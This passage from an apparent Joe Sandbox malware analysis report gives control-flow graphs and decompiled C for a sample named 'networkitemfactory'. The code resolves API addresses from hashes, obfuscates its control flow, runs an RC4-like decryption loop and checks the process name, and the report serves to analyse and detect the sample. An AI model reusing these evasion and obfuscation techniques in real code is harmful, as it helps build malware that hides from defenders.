                                                                                                      0x020b9823
                                                                                                      0x020b983b
                                                                                                      0x020b983d
                                                                                                      0x020b983d
                                                                                                      0x020b9843
                                                                                                      0x020b9859
                                                                                                      0x020b985b
                                                                                                      0x020b985d
                                                                                                      0x020b9862
                                                                                                      0x00000000
                                                                                                      0x020b9731
                                                                                                      0x020b9731
                                                                                                      0x020b9736
                                                                                                      0x020b97f9
                                                                                                      0x020b97fe
                                                                                                      0x020b9982
                                                                                                      0x020b9987
                                                                                                      0x020b9989
                                                                                                      0x020b999c
                                                                                                      0x020b99a1
                                                                                                      0x020b99a1
                                                                                                      0x020b99b3
                                                                                                      0x020b99b5
                                                                                                      0x020b99be
                                                                                                      0x020b99c4
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b973c
                                                                                                      0x020b973c
                                                                                                      0x020b97aa
                                                                                                      0x020b97ac
                                                                                                      0x020b97c4
                                                                                                      0x020b97c4
                                                                                                      0x020b97d2
                                                                                                      0x020b97d4
                                                                                                      0x020b97d6
                                                                                                      0x020b97d8
                                                                                                      0x020b97ef
                                                                                                      0x020b97da
                                                                                                      0x020b97da
                                                                                                      0x020b97df
                                                                                                      0x020b97e5
                                                                                                      0x020b97e5
                                                                                                      0x00000000
                                                                                                      0x020b973e
                                                                                                      0x020b9743
                                                                                                      0x020b9774
                                                                                                      0x020b9779
                                                                                                      0x020b977b
                                                                                                      0x020b978e
                                                                                                      0x020b9793
                                                                                                      0x020b9793
                                                                                                      0x020b9799
                                                                                                      0x020b979b
                                                                                                      0x00000000
                                                                                                      0x020b9745
                                                                                                      0x020b974a
                                                                                                      0x00000000
                                                                                                      0x020b9750
                                                                                                      0x020b9755
                                                                                                      0x020b975a
                                                                                                      0x020b9761
                                                                                                      0x020b99cc
                                                                                                      0x020b99d7
                                                                                                      0x020b9767
                                                                                                      0x020b9767
                                                                                                      0x020b976d
                                                                                                      0x00000000
                                                                                                      0x020b976d
                                                                                                      0x020b9761
                                                                                                      0x020b974a
                                                                                                      0x020b9743
                                                                                                      0x020b973c
                                                                                                      0x020b9736
                                                                                                      0x00000000
                                                                                                      0x020b972b
                                                                                                      0x020b986a
                                                                                                      0x020b986f
                                                                                                      0x020b992f
                                                                                                      0x020b9934
                                                                                                      0x00000000
                                                                                                      0x020b993a
                                                                                                      0x020b993a
                                                                                                      0x020b9947
                                                                                                      0x020b9954
                                                                                                      0x020b9963
                                                                                                      0x020b9971
                                                                                                      0x020b9975
                                                                                                      0x00000000
                                                                                                      0x020b9975
                                                                                                      0x020b9875
                                                                                                      0x020b9875
                                                                                                      0x020b98de
                                                                                                      0x020b98e3
                                                                                                      0x020b98e5
                                                                                                      0x020b98f8
                                                                                                      0x020b98fd
                                                                                                      0x020b98fd
                                                                                                      0x020b990e
                                                                                                      0x020b9914
                                                                                                      0x020b9919
                                                                                                      0x020b991f
                                                                                                      0x020b9925
                                                                                                      0x00000000
                                                                                                      0x020b9877
                                                                                                      0x020b9877
                                                                                                      0x020b987c
                                                                                                      0x020b98cf
                                                                                                      0x020b98d4
                                                                                                      0x00000000
                                                                                                      0x020b987e
                                                                                                      0x020b987e
                                                                                                      0x020b9883
                                                                                                      0x00000000
                                                                                                      0x020b9889
                                                                                                      0x020b9889
                                                                                                      0x020b9891
                                                                                                      0x020b9899
                                                                                                      0x020b98a1
                                                                                                      0x020b98a9
                                                                                                      0x020b98b1
                                                                                                      0x020b98b9
                                                                                                      0x020b98be
                                                                                                      0x020b98c5
                                                                                                      0x00000000
                                                                                                      0x020b98c5
                                                                                                      0x020b9883
                                                                                                      0x020b987c
                                                                                                      0x020b9875
                                                                                                      0x00000000
                                                                                                      0x020b9804
                                                                                                      0x020b9804
                                                                                                      0x020b9804
                                                                                                      0x020b981a
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,000F003F), ref: 020B97D2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID: t4B$t4B
                                                                                                      • API String ID: 1889721586-575686366
                                                                                                      • Opcode ID: 6f5a2e901f5c27c7cc871722522a870e469681572e0f1e3248597d99c4e6c382
                                                                                                      • Instruction ID: 5b2ea77bb767a4d64e3bf388368e66aeaed7f06a607cd13483206aae53c84ab1
                                                                                                      • Opcode Fuzzy Hash: 6f5a2e901f5c27c7cc871722522a870e469681572e0f1e3248597d99c4e6c382
                                                                                                      • Instruction Fuzzy Hash: 7751C074B483049BEB7B9F28D4857EE73D2AF85710F508C29A655CB290DB38E844DF52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 617 20b3060-20b3076 618 20b307a-20b307f 617->618 619 20b3080-20b3085 618->619 620 20b308b 619->620 621 20b3163-20b3168 619->621 624 20b3129-20b3131 620->624 625 20b3091-20b3096 620->625 622 20b316a-20b316f 621->622 623 20b31b6-20b3250 621->623 626 20b31a3-20b31b1 call 20b3c90 622->626 627 20b3171-20b3176 622->627 623->618 630 20b3133-20b314b call 20b3e70 call 20b3dd0 624->630 631 20b3151-20b315e 624->631 628 20b3098-20b309d 625->628 629 20b30bf-20b30c6 625->629 626->618 632 20b318b-20b3190 627->632 633 20b3178-20b3186 627->633 634 20b30a3-20b30a8 628->634 635 20b3255-20b325d 628->635 637 20b30c8-20b30de call 20b3e70 call 20b3dd0 629->637 638 20b30e3-20b30ee 629->638 630->631 631->618 632->619 641 20b3196-20b31a0 632->641 633->619 634->632 642 20b30ae-20b30b2 634->642 646 20b325f-20b3277 call 20b3e70 call 20b3dd0 635->646 647 20b327d-20b32a0 635->647 637->638 655 20b310b-20b3119 RtlAllocateHeap 638->655 656 20b30f0-20b3106 call 20b3e70 call 20b3dd0 638->656 649 20b30b8-20b30bd 642->649 650 20b32a3-20b32ad 642->650 646->647 647->650 649->619 655->650 662 20b311f-20b3124 655->662 656->655 662->618
                                                                                                      C-Code - Quality: 71%
                                                                                                      			E020B3060() {
                                                                                                      				void* __ebx;
                                                                                                      				void* __ecx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t54;
                                                                                                      				intOrPtr* _t67;
                                                                                                      				void* _t70;
                                                                                                      				intOrPtr _t81;
                                                                                                      				intOrPtr* _t93;
                                                                                                      				intOrPtr _t94;
                                                                                                      				intOrPtr* _t110;
                                                                                                      				void* _t112;
                                                                                                      				void* _t113;
                                                                                                      				intOrPtr _t114;
                                                                                                      				signed int _t119;
                                                                                                      				void* _t120;
                                                                                                      				void* _t121;
                                                                                                      
                                                                                                      				_t81 =  *((intOrPtr*)(_t120 + 0xc));
                                                                                                      				_t54 = 0x2746532a;
                                                                                                      				_t119 =  *(_t120 + 0x10);
                                                                                                      				_t114 =  *((intOrPtr*)(_t120 + 0x14));
                                                                                                      				_t112 =  *(_t120 + 0x18);
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					do {
                                                                                                      						while(1) {
                                                                                                      							L2:
                                                                                                      							_t121 = _t54 - 0x1b879e60;
                                                                                                      							if(_t121 > 0) {
                                                                                                      								break;
                                                                                                      							}
                                                                                                      							if(_t121 == 0) {
                                                                                                      								_t93 =  *0x20bdf1c;
                                                                                                      								if(_t93 == 0) {
                                                                                                      									_t93 = E020B3DD0(_t81, E020B3E70(0x755194fe), 0xd778cb9a, _t119);
                                                                                                      									 *0x20bdf1c = _t93;
                                                                                                      								}
                                                                                                      								_t114 =  *_t93(_t119 + 0x2c);
                                                                                                      								_t54 = 0x2fd692b6;
                                                                                                      								while(1) {
                                                                                                      									L1:
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t54 == 0x2620d36) {
                                                                                                      									_t67 =  *0x20bddc8;
                                                                                                      									if(_t67 == 0) {
                                                                                                      										_t67 = E020B3DD0(_t81, E020B3E70(0xbb51e2dc), 0x298e8809, _t119);
                                                                                                      										 *0x20bddc8 = _t67;
                                                                                                      									}
                                                                                                      									_t113 =  *_t67();
                                                                                                      									if( *0x20bdcf0 == 0) {
                                                                                                      										 *0x20bdcf0 = E020B3DD0(_t81, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t119);
                                                                                                      									}
                                                                                                      									_t70 = RtlAllocateHeap(_t113, 8, 0x23c); // executed
                                                                                                      									_t112 = _t70;
                                                                                                      									if(_t112 == 0) {
                                                                                                      										goto L29;
                                                                                                      									} else {
                                                                                                      										_t54 = 0x65a2174;
                                                                                                      										while(1) {
                                                                                                      											L1:
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									if(_t54 == 0x65a2174) {
                                                                                                      										_t110 =  *0x20be018;
                                                                                                      										if(_t110 == 0) {
                                                                                                      											_t110 = E020B3DD0(_t81, E020B3E70(0xbb51e2dc), 0x7bd685bc, _t119);
                                                                                                      											 *0x20be018 = _t110;
                                                                                                      										}
                                                                                                      										 *_t110(_t112 + 0x28, _t119 + 0x2c, (_t114 - _t119 - 0x2c >> 1) + 1);
                                                                                                      										_t94 =  *((intOrPtr*)(_t120 + 0x1c));
                                                                                                      										 *(_t112 + 0x230) =  *(_t94 + 0x18);
                                                                                                      										 *((intOrPtr*)(_t94 + 0x24)) =  *((intOrPtr*)(_t94 + 0x24)) + 1;
                                                                                                      										 *(_t94 + 0x18) = _t112;
                                                                                                      										goto L29;
                                                                                                      									} else {
                                                                                                      										if(_t54 != 0x1936db13) {
                                                                                                      											goto L22;
                                                                                                      										} else {
                                                                                                      											if(_t81 !=  *(_t120 + 0x18)) {
                                                                                                      												L29:
                                                                                                      												return 1;
                                                                                                      											} else {
                                                                                                      												_t54 = 0x2620d36;
                                                                                                      												continue;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							L30:
                                                                                                      						}
                                                                                                      						if(_t54 == 0x2746532a) {
                                                                                                      							 *(_t120 + 0x18) = 0x1355;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) << 3;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) ^ 0x2b7aa775;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) * 0x4e;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) + 0x6616;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) | 0xe186295c;
                                                                                                      							 *(_t120 + 0x18) = ( *(_t120 + 0x18) - (0xbacf914d *  *(_t120 + 0x18) >> 0x20) >> 1) + (0xbacf914d *  *(_t120 + 0x18) >> 0x20) >> 6;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) ^ 0x8d190104;
                                                                                                      							 *(_t120 + 0x10) = 0x990b;
                                                                                                      							_t87 =  *(_t120 + 0x10);
                                                                                                      							_t54 = 0x1b879e60;
                                                                                                      							 *(_t120 + 0x10) = ( *(_t120 + 0x10) - (0x21fb7813 * _t87 >> 0x20) >> 1) + (0x21fb7813 * _t87 >> 0x20) >> 6;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) >> 8;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) ^ 0x03a1830e;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) << 0xc;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) | 0xea8992c4;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) << 9;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) ^ 0xfe0623b6;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							if(_t54 == 0x2fd692b6) {
                                                                                                      								_t81 = E020B3C90(_t114);
                                                                                                      								_t54 = 0x36cc697c;
                                                                                                      								while(1) {
                                                                                                      									L1:
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t54 != 0x36cc697c) {
                                                                                                      									goto L22;
                                                                                                      								} else {
                                                                                                      									_t54 =  ==  ? 0x2620d36 : 0x1936db13;
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						goto L30;
                                                                                                      						L22:
                                                                                                      					} while (_t54 != 0x1a6d5b53);
                                                                                                      					return 1;
                                                                                                      					goto L30;
                                                                                                      				}
                                                                                                      			}



















                                                                                                      0x020b3062
                                                                                                      0x020b3066
                                                                                                      0x020b306c
                                                                                                      0x020b3071
                                                                                                      0x020b3076
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x020b3080
                                                                                                      0x020b3080
                                                                                                      0x020b3080
                                                                                                      0x020b3080
                                                                                                      0x020b3085
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b308b
                                                                                                      0x020b3129
                                                                                                      0x020b3131
                                                                                                      0x020b3149
                                                                                                      0x020b314b
                                                                                                      0x020b314b
                                                                                                      0x020b3157
                                                                                                      0x020b3159
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x00000000
                                                                                                      0x020b307a
                                                                                                      0x020b3091
                                                                                                      0x020b3096
                                                                                                      0x020b30bf
                                                                                                      0x020b30c6
                                                                                                      0x020b30d9
                                                                                                      0x020b30de
                                                                                                      0x020b30de
                                                                                                      0x020b30e5
                                                                                                      0x020b30ee
                                                                                                      0x020b3106
                                                                                                      0x020b3106
                                                                                                      0x020b3113
                                                                                                      0x020b3115
                                                                                                      0x020b3119
                                                                                                      0x00000000
                                                                                                      0x020b311f
                                                                                                      0x020b311f
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x00000000
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x020b3098
                                                                                                      0x020b309d
                                                                                                      0x020b3255
                                                                                                      0x020b325d
                                                                                                      0x020b3275
                                                                                                      0x020b3277
                                                                                                      0x020b3277
                                                                                                      0x020b328e
                                                                                                      0x020b3290
                                                                                                      0x020b3297
                                                                                                      0x020b329d
                                                                                                      0x020b32a0
                                                                                                      0x00000000
                                                                                                      0x020b30a3
                                                                                                      0x020b30a8
                                                                                                      0x00000000
                                                                                                      0x020b30ae
                                                                                                      0x020b30b2
                                                                                                      0x020b32a6
                                                                                                      0x020b32ad
                                                                                                      0x020b30b8
                                                                                                      0x020b30b8
                                                                                                      0x00000000
                                                                                                      0x020b30b8
                                                                                                      0x020b30b2
                                                                                                      0x020b30a8
                                                                                                      0x020b309d
                                                                                                      0x020b3096
                                                                                                      0x00000000
                                                                                                      0x020b308b
                                                                                                      0x020b3168
                                                                                                      0x020b31b6
                                                                                                      0x020b31be
                                                                                                      0x020b31c3
                                                                                                      0x020b31d0
                                                                                                      0x020b31d9
                                                                                                      0x020b31e1
                                                                                                      0x020b31fd
                                                                                                      0x020b3201
                                                                                                      0x020b3209
                                                                                                      0x020b3211
                                                                                                      0x020b3217
                                                                                                      0x020b3225
                                                                                                      0x020b3229
                                                                                                      0x020b322e
                                                                                                      0x020b3236
                                                                                                      0x020b323b
                                                                                                      0x020b3243
                                                                                                      0x020b3248
                                                                                                      0x00000000
                                                                                                      0x020b316a
                                                                                                      0x020b316f
                                                                                                      0x020b31aa
                                                                                                      0x020b31ac
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x00000000
                                                                                                      0x020b307a
                                                                                                      0x020b3171
                                                                                                      0x020b3176
                                                                                                      0x00000000
                                                                                                      0x020b3178
                                                                                                      0x020b3183
                                                                                                      0x00000000
                                                                                                      0x020b3183
                                                                                                      0x020b3176
                                                                                                      0x020b316f
                                                                                                      0x00000000
                                                                                                      0x020b318b
                                                                                                      0x020b318b
                                                                                                      0x020b31a0
                                                                                                      0x00000000
                                                                                                      0x020b31a0

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,0000023C), ref: 020B3113
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID: *SF'$*SF'
                                                                                                      • API String ID: 1279760036-2165348068
                                                                                                      • Opcode ID: f2b674458fbbe6a5eda6e775847fbdd22a12bf858c3579e23d7a2e521a1f86ef
                                                                                                      • Instruction ID: 23e998595922a2dfa47119039816650fda5546f11d0674cc4e68e55387db84df
                                                                                                      • Opcode Fuzzy Hash: f2b674458fbbe6a5eda6e775847fbdd22a12bf858c3579e23d7a2e521a1f86ef
                                                                                                      • Instruction Fuzzy Hash: BE51D271B043028BC76EDF6894942AEBBE6BFD8240F204D6EE452C7350DB70D9499BD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 668 402190-4021b9 call 4025d7 * 2 673 4021e7-4021eb 668->673 674 4021bb-4021bd 668->674 675 40222d-402238 673->675 676 4021ed-4021fc 673->676 677 4021c0-4021e0 674->677 679 4022a9-4022af 675->679 680 40223a-402243 675->680 678 402200-402228 676->678 677->677 681 4021e2-4021e5 677->681 678->678 682 40222a 678->682 683 402246-40229c ShowWindow 680->683 681->673 682->675 683->679 684 40229e-4022a7 683->684 684->683
                                                                                                      C-Code - Quality: 98%
                                                                                                      			E00402190(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, signed int _a16, signed char* _a20) {
                                                                                                      				signed char _v8;
                                                                                                      				signed int _v12;
                                                                                                      				struct HWND__* _v16;
                                                                                                      				intOrPtr _v20;
                                                                                                      				void* __ebx;
                                                                                                      				void* __edi;
                                                                                                      				void* _t70;
                                                                                                      				signed char _t71;
                                                                                                      				signed int _t85;
                                                                                                      				struct HWND__* _t90;
                                                                                                      				signed int _t91;
                                                                                                      				void* _t94;
                                                                                                      				void* _t95;
                                                                                                      				signed char _t96;
                                                                                                      				signed char _t98;
                                                                                                      				signed int _t99;
                                                                                                      				signed int _t100;
                                                                                                      				signed char _t101;
                                                                                                      				signed char* _t103;
                                                                                                      				signed char _t107;
                                                                                                      				void* _t108;
                                                                                                      				signed int _t109;
                                                                                                      				signed int _t113;
                                                                                                      				signed int _t119;
                                                                                                      				signed int _t121;
                                                                                                      				signed char _t123;
                                                                                                      				char* _t124;
                                                                                                      
                                                                                                      				_t119 =  *0x43502c; // 0x6700
                                                                                                      				_t70 = E004025D7(_t94, _t108, _t119, _t119); // executed
                                                                                                      				_t95 = _t70; // executed
                                                                                                      				_t71 = E004025D7(_t95, _t108, _t119, _t119); // executed
                                                                                                      				_v8 = _t71;
                                                                                                      				_t109 = 0;
                                                                                                      				_t99 = 0;
                                                                                                      				if(_t119 != 0) {
                                                                                                      					_t90 = _t71 - _t95;
                                                                                                      					_v16 = _t90;
                                                                                                      					do {
                                                                                                      						_t124 = _t99 + _t95;
                                                                                                      						 *(_t90 + _t124) = _t99;
                                                                                                      						_t91 = _t99;
                                                                                                      						asm("cdq");
                                                                                                      						_t99 = _t99 + 1;
                                                                                                      						_t119 =  *0x43502c; // 0x6700
                                                                                                      						 *_t124 =  *((intOrPtr*)(_t91 % _a16 + _a12));
                                                                                                      						_t90 = _v16;
                                                                                                      					} while (_t99 < _t119);
                                                                                                      					_t71 = _v8;
                                                                                                      					_t109 = 0;
                                                                                                      				}
                                                                                                      				_t100 = 0;
                                                                                                      				if(_t119 != 0) {
                                                                                                      					_t123 = _t71;
                                                                                                      					_t85 = _t119;
                                                                                                      					_v20 = _t95 - _t71;
                                                                                                      					_v16 = _t85;
                                                                                                      					_v12 = _t85;
                                                                                                      					do {
                                                                                                      						_t123 = _t123 + 1;
                                                                                                      						_t98 =  *(_t123 - 1);
                                                                                                      						_t109 = ((_t98 & 0x000000ff) + ( *(_v20 + _t123 - 1) & 0x000000ff) + _t109) % _t119;
                                                                                                      						_t27 =  &_v16;
                                                                                                      						 *_t27 = _v16 - 1;
                                                                                                      						_t107 = _v8;
                                                                                                      						_t71 =  *(_t109 + _t107);
                                                                                                      						 *(_t109 + _t107) = _t98;
                                                                                                      						 *(_t123 - 1) = _t71;
                                                                                                      					} while ( *_t27 != 0);
                                                                                                      					_t100 = _v12;
                                                                                                      				}
                                                                                                      				_v16 = 0;
                                                                                                      				if(_a8 > 0) {
                                                                                                      					_t96 = _v8;
                                                                                                      					_a4 = _a4 - _a20;
                                                                                                      					while(1) {
                                                                                                      						_t40 = _t100 + 1; // 0x1
                                                                                                      						_t121 = _t40 % _t119;
                                                                                                      						_v12 = _t121;
                                                                                                      						_t113 = (_v16 + ( *(_t121 + _t96) & 0x000000ff)) % _t119;
                                                                                                      						_v16 = _t113;
                                                                                                      						_t101 =  *(_t113 + _t96);
                                                                                                      						 *(_t113 + _t96) =  *(_t121 + _t96) & 0x000000ff;
                                                                                                      						 *(_t121 + _t96) = _t101;
                                                                                                      						ShowWindow(0, 0); // executed
                                                                                                      						_t103 = _a20;
                                                                                                      						_t71 =  *(_a4 + _t103) & 0x000000ff ^  *(((_t101 & 0x000000ff) + ( *(_t113 + _t96) & 0x000000ff)) % _t119 + _t96);
                                                                                                      						 *_t103 = _t71;
                                                                                                      						_t66 =  &_a8;
                                                                                                      						 *_t66 = _a8 - 1;
                                                                                                      						_a20 =  &(_t103[1]);
                                                                                                      						if( *_t66 == 0) {
                                                                                                      							goto L12;
                                                                                                      						}
                                                                                                      						_t119 =  *0x43502c; // 0x6700
                                                                                                      						_t100 = _v12;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				L12:
                                                                                                      				return _t71;
                                                                                                      			}






























                                                                                                      0x00402199
                                                                                                      0x004021a0
                                                                                                      0x004021a6
                                                                                                      0x004021a8
                                                                                                      0x004021b0
                                                                                                      0x004021b3
                                                                                                      0x004021b5
                                                                                                      0x004021b9
                                                                                                      0x004021bb
                                                                                                      0x004021bd
                                                                                                      0x004021c0
                                                                                                      0x004021c0
                                                                                                      0x004021c6
                                                                                                      0x004021c9
                                                                                                      0x004021cb
                                                                                                      0x004021cc
                                                                                                      0x004021d3
                                                                                                      0x004021d9
                                                                                                      0x004021db
                                                                                                      0x004021de
                                                                                                      0x004021e2
                                                                                                      0x004021e5
                                                                                                      0x004021e5
                                                                                                      0x004021e7
                                                                                                      0x004021eb
                                                                                                      0x004021ef
                                                                                                      0x004021f1
                                                                                                      0x004021f3
                                                                                                      0x004021f6
                                                                                                      0x004021f9
                                                                                                      0x00402200
                                                                                                      0x00402203
                                                                                                      0x00402206
                                                                                                      0x00402217
                                                                                                      0x00402219
                                                                                                      0x00402219
                                                                                                      0x0040221c
                                                                                                      0x0040221f
                                                                                                      0x00402222
                                                                                                      0x00402225
                                                                                                      0x00402225
                                                                                                      0x0040222a
                                                                                                      0x0040222a
                                                                                                      0x00402231
                                                                                                      0x00402238
                                                                                                      0x00402240
                                                                                                      0x00402243
                                                                                                      0x00402246
                                                                                                      0x00402248
                                                                                                      0x0040224f
                                                                                                      0x00402253
                                                                                                      0x0040225f
                                                                                                      0x00402265
                                                                                                      0x00402268
                                                                                                      0x0040226b
                                                                                                      0x0040226e
                                                                                                      0x00402280
                                                                                                      0x00402286
                                                                                                      0x00402290
                                                                                                      0x00402293
                                                                                                      0x00402296
                                                                                                      0x00402296
                                                                                                      0x00402299
                                                                                                      0x0040229c
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040229e
                                                                                                      0x004022a4
                                                                                                      0x004022a4
                                                                                                      0x00402246
                                                                                                      0x004022af
                                                                                                      0x004022af

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 004021A0
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00520000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • _malloc.LIBCMT ref: 004021A8
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00402280
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _malloc$AllocateHeapShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029182426-0
                                                                                                      • Opcode ID: 414393e4c0a2ca2fefc8c6585836cd36396bea82b3bbe22be38456031dbfa9e9
                                                                                                      • Instruction ID: c59e8e181be4432f579234cb94a6521dd56dcdf708861cff6199d573f643a35f
                                                                                                      • Opcode Fuzzy Hash: 414393e4c0a2ca2fefc8c6585836cd36396bea82b3bbe22be38456031dbfa9e9
                                                                                                      • Instruction Fuzzy Hash: CE41C635D042559FCB15CF6AC8906AEFFF1AF9A310F1880AED894AB342C6759A41CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 685 20b9c40-20b9c4e 686 20b9c50-20b9c55 685->686 687 20b9cc1-20b9cc6 686->687 688 20b9c57 686->688 689 20b9c6b-20b9c70 687->689 690 20b9cc8-20b9cd8 687->690 691 20b9c59-20b9c5e 688->691 692 20b9c85-20b9c8c 688->692 689->686 697 20b9c72-20b9c7d 689->697 693 20b9cda-20b9cf2 call 20b3e70 call 20b3dd0 690->693 694 20b9cf8-20b9d00 690->694 695 20b9c7e-20b9c83 691->695 696 20b9c60-20b9c65 691->696 698 20b9ca9-20b9cbf 692->698 699 20b9c8e-20b9ca4 call 20b3e70 call 20b3dd0 692->699 693->694 702 20b9d02-20b9d1a call 20b3e70 call 20b3dd0 694->702 703 20b9d20-20b9d36 GetCurrentProcess QueryFullProcessImageNameW 694->703 695->686 696->689 701 20b9d3b-20b9d42 696->701 698->686 699->698 707 20b9d5f-20b9d83 lstrcmpiW 701->707 708 20b9d44-20b9d5a call 20b3e70 call 20b3dd0 701->708 702->703 703->686 708->707
                                                                                                      C-Code - Quality: 79%
                                                                                                      			E020B9C40(void* __ebp) {
                                                                                                      				short _v520;
                                                                                                      				short _v1040;
                                                                                                      				char _v1044;
                                                                                                      				void* __ebx;
                                                                                                      				void* _t7;
                                                                                                      				intOrPtr* _t17;
                                                                                                      				intOrPtr* _t43;
                                                                                                      				void* _t46;
                                                                                                      				void* _t49;
                                                                                                      
                                                                                                      				_t46 = __ebp;
                                                                                                      				_t7 = 0x1176b9c;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t49 = _t7 - 0x1997100a;
                                                                                                      						if(_t49 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t49 == 0) {
                                                                                                      							_t17 =  *0x20be028;
                                                                                                      							if(_t17 == 0) {
                                                                                                      								_t17 = E020B3DD0(0, E020B3E70(0xbb51e2dc), 0x2bebef82, _t46);
                                                                                                      								 *0x20be028 = _t17;
                                                                                                      							}
                                                                                                      							 *_t17(0,  &_v520, 0x104);
                                                                                                      							_t7 = 0x1ea55ff7;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							if(_t7 == 0x1176b9c) {
                                                                                                      								_t7 = 0x1997100a;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								if(_t7 == 0x3a02c02) {
                                                                                                      									if( *0x20bdb84 == 0) {
                                                                                                      										 *0x20bdb84 = E020B3DD0(0, E020B3E70(0xbb51e2dc), 0xebde84a3, _t46);
                                                                                                      									}
                                                                                                      									lstrcmpiW( &_v520,  &_v1040); // executed
                                                                                                      									_t26 =  !=  ? 1 : 0;
                                                                                                      									return  !=  ? 1 : 0;
                                                                                                      								} else {
                                                                                                      									goto L5;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L20:
                                                                                                      					}
                                                                                                      					if(_t7 != 0x1ea55ff7) {
                                                                                                      						goto L5;
                                                                                                      					} else {
                                                                                                      						_v1044 = 0x104;
